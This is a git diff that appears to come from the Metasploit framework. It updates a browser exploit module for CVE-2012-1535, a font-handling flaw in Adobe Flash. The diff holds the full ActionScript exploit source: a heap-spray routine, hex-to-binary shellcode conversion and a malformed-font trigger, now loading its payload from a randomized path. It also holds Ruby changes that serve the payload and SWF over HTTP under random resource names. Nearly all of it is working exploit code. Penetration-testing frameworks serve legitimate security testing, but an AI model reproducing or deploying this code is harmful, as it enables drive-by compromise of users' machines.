diff --git a/data/exploits/CVE-2012-1535/Main.swf b/data/exploits/CVE-2012-1535/Main.swf new file mode 100755 index 0000000000..50be0449af Binary files /dev/null and b/data/exploits/CVE-2012-1535/Main.swf differ diff --git a/data/exploits/CVE-2012-1535/trigger.swf b/data/exploits/CVE-2012-1535/trigger.swf deleted file mode 100755 index 53352fd37e..0000000000 Binary files a/data/exploits/CVE-2012-1535/trigger.swf and /dev/null differ diff --git a/external/source/exploits/CVE-2012-1535/Main.as b/external/source/exploits/CVE-2012-1535/Main.as index e537c31427..3b6daf342a 100755 --- a/external/source/exploits/CVE-2012-1535/Main.as +++ b/external/source/exploits/CVE-2012-1535/Main.as @@ -1,118 +1,119 @@ package { - import flash.text.engine.*; - import flash.utils.*; - import flash.display.*; - import flash.events.*; - import flash.net.*; - import flash.external.*; + import flash.text.engine.*; + import flash.utils.*; + import flash.display.*; + import flash.events.*; + import flash.net.*; + import flash.external.*; - public class Main extends Sprite { + public class Main extends Sprite { - private var FontClass:Class; - public var kbArray:ByteArray; - public var mbArray:ByteArray; - public var tmpArray:ByteArray; - public var allocs:Array; - private var shellcode:String; - private var urlLoader:URLLoader = new URLLoader(); + private var FontClass:Class; + public var kbArray:ByteArray; + public var mbArray:ByteArray; + public var tmpArray:ByteArray; + public var allocs:Array; + private var shellcode:String; + private var urlLoader:URLLoader = new URLLoader(); - public function Main():void{ - this.FontClass = Main_FontClass; - super(); - var path:String = "/pay.txt"; - var urlRequest:URLRequest = new URLRequest(path); - urlLoader.dataFormat = URLLoaderDataFormat.TEXT; - urlLoader.addEventListener(Event.COMPLETE, urlLoader_complete); - urlLoader.load(urlRequest); - } - - public function finishExploit(p:String):void{ - this.heapSpray(p); - this.TextBlock_createTextLineExample(); - } - - public function urlLoader_complete(evt:Event):void { - finishExploit(urlLoader.data); - } - - public function TextBlock_createTextLineExample():void{ - var _local1 = "Edit the world in hex."; - var _local2:FontDescription = new FontDescription("PSpop"); - _local2.fontLookup = FontLookup.EMBEDDED_CFF; - var _local3:ElementFormat = new ElementFormat(_local2); - _local3.fontSize = 16; - var _local4:TextElement = new TextElement(_local1, _local3); - var _local5:TextBlock = new TextBlock(); - _local5.content = _local4; - this.createLines(_local5); - } + public function Main():void{ + this.FontClass = Main_FontClass; + super(); + var source:String = root.loaderInfo.parameters.s; + var path:String = "/" + source + ".txt" + var urlRequest:URLRequest = new URLRequest(path); + urlLoader.dataFormat = URLLoaderDataFormat.TEXT; + urlLoader.addEventListener(Event.COMPLETE, urlLoader_complete); + urlLoader.load(urlRequest); + } - private function createLines(_arg1:TextBlock):void{ - var _local2:Number = 300; - var _local3:Number = 15; - var _local4:Number = 20; - var _local5:TextLine = _arg1.createTextLine(null, _local2); - while (_local5) { - _local5.x = _local3; - _local5.y = _local4; - _local4 = (_local4 + (_local5.height + 2)); - addChild(_local5); - _local5 = _arg1.createTextLine(_local5, _local2); - }; - } + public function finishExploit(p:String):void{ + this.heapSpray(p); + this.TextBlock_createTextLineExample(); + } - public function heapSpray(p:String):void{ - var _local1:uint; - _local1 = 0; - this.kbArray = new ByteArray(); - this.kbArray.endian = Endian.LITTLE_ENDIAN; - var _local4:String = p; - var _local5:ByteArray = this.hexToBin(_local4); - var _local6:uint = (_local4.length / 2); - - _local1 = 0; - while (_local1 < 0x0400) { - this.kbArray.writeByte(12); - _local1 = (_local1 + 1); - }; - - _local1 = 0; - this.mbArray = new ByteArray(); - this.mbArray.endian = Endian.LITTLE_ENDIAN; - while (_local1 < 0x0400) { - this.mbArray.writeBytes(this.kbArray, 0, this.kbArray.length); - _local1 = (_local1 + 1); - }; - _local1 = 0; - while (_local1 < 0x100000) { - this.mbArray.position = _local1; - this.mbArray.writeBytes(_local5, 0, _local5.length); - _local1 = (_local1 + 65536); - }; - _local1 = 0; - this.allocs = new Array(); - while (_local1 < 0x0200) { - this.tmpArray = new ByteArray(); - this.tmpArray.endian = Endian.LITTLE_ENDIAN; - this.tmpArray.writeBytes(this.mbArray, 0, this.mbArray.length); - this.allocs.push(this.tmpArray); - _local1 = (_local1 + 1); - }; - } + public function urlLoader_complete(evt:Event):void { + finishExploit(urlLoader.data); + } - private function hexToBin(_arg1:String):ByteArray{ - var _local5:String; - var _local2:ByteArray = new ByteArray(); - var _local3:uint = _arg1.length; - var _local4:uint; - _local2.endian = Endian.LITTLE_ENDIAN; - while (_local4 < _local3) { - _local5 = (_arg1.charAt(_local4) + _arg1.charAt((_local4 + 1))); - _local2.writeByte(parseInt(_local5, 16)); - _local4 = (_local4 + 2); - }; - return (_local2); - } - - } -} + public function TextBlock_createTextLineExample():void{ + var _local1 = "Edit the world in hex."; + var _local2:FontDescription = new FontDescription("PSpop"); + _local2.fontLookup = FontLookup.EMBEDDED_CFF; + var _local3:ElementFormat = new ElementFormat(_local2); + _local3.fontSize = 16; + var _local4:TextElement = new TextElement(_local1, _local3); + var _local5:TextBlock = new TextBlock(); + _local5.content = _local4; + this.createLines(_local5); + } + + private function createLines(_arg1:TextBlock):void{ + var _local2:Number = 300; + var _local3:Number = 15; + var _local4:Number = 20; + var _local5:TextLine = _arg1.createTextLine(null, _local2); + while (_local5) { + _local5.x = _local3; + _local5.y = _local4; + _local4 = (_local4 + (_local5.height + 2)); + addChild(_local5); + _local5 = _arg1.createTextLine(_local5, _local2); + }; + } + + public function heapSpray(p:String):void{ + var _local1:uint; + _local1 = 0; + this.kbArray = new ByteArray(); + this.kbArray.endian = Endian.LITTLE_ENDIAN; + var _local4:String = p; + var _local5:ByteArray = this.hexToBin(_local4); + var _local6:uint = (_local4.length / 2); + + _local1 = 0; + while (_local1 < 0x0400) { + this.kbArray.writeByte(12); + _local1 = (_local1 + 1); + }; + + _local1 = 0; + this.mbArray = new ByteArray(); + this.mbArray.endian = Endian.LITTLE_ENDIAN; + while (_local1 < 0x0400) { + this.mbArray.writeBytes(this.kbArray, 0, this.kbArray.length); + _local1 = (_local1 + 1); + }; + _local1 = 0; + while (_local1 < 0x100000) { + this.mbArray.position = _local1; + this.mbArray.writeBytes(_local5, 0, _local5.length); + _local1 = (_local1 + 65536); + }; + _local1 = 0; + this.allocs = new Array(); + while (_local1 < 0x0200) { + this.tmpArray = new ByteArray(); + this.tmpArray.endian = Endian.LITTLE_ENDIAN; + this.tmpArray.writeBytes(this.mbArray, 0, this.mbArray.length); + this.allocs.push(this.tmpArray); + _local1 = (_local1 + 1); + }; + } + + private function hexToBin(_arg1:String):ByteArray{ + var _local5:String; + var _local2:ByteArray = new ByteArray(); + var _local3:uint = _arg1.length; + var _local4:uint; + _local2.endian = Endian.LITTLE_ENDIAN; + while (_local4 < _local3) { + _local5 = (_arg1.charAt(_local4) + _arg1.charAt((_local4 + 1))); + _local2.writeByte(parseInt(_local5, 16)); + _local4 = (_local4 + 2); + }; + return (_local2); + } + + } +} diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb index 79d7c87d86..1efddb13c8 100644 --- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb +++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = AverageRanking + Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML @@ -264,7 +264,8 @@ class Metasploit3 < Msf::Exploit::Remote return end - swf_uri = get_resource() + Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf" + #swf_uri = get_resource() + Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf" + swf_uri = "/#{@resource_name}.txt.swf" html = %Q| @@ -273,6 +274,7 @@ class Metasploit3 < Msf::Exploit::Remote + @@ -284,7 +286,7 @@ class Metasploit3 < Msf::Exploit::Remote proc = Proc.new do |cli, req| on_request_uri(cli, req) end - add_resource({'Path' => "/pay.txt", 'Proc' => proc}) rescue nil + add_resource({'Path' => "/#{@resource_name}.txt", 'Proc' => proc}) rescue nil print_status("Sending HTML") send_response(cli, html, {'Content-Type'=>'text/html'}) @@ -292,12 +294,19 @@ class Metasploit3 < Msf::Exploit::Remote def exploit @swf = create_swf - print_status("SWF Loaded: #{@swf.length.to_s} bytes") + @resource_name = Rex::Text.rand_text_alpha(5) + vprint_status("SWF Loaded: #{@swf.length.to_s} bytes") + + datastore['URIPATH'] = datastore['URIPATH'] || random_uri + datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\// + datastore['URIPATH'] = datastore['URIPATH'][0,3] if datastore['URIPATH'].length > 3 + vprint_status("URIPATH set to #{datastore['URIPATH']}") + super end def create_swf - path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-1535", "trigger.swf" ) + path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-1535", "Main.swf" ) fd = ::File.open( path, "rb" ) swf = fd.read(fd.stat.size) fd.close @@ -306,7 +315,7 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup vprint_status("Removing txt resource") - remove_resource('/pay.txt') rescue nil + remove_resource("/#{@resource_name}.txt") rescue nil super end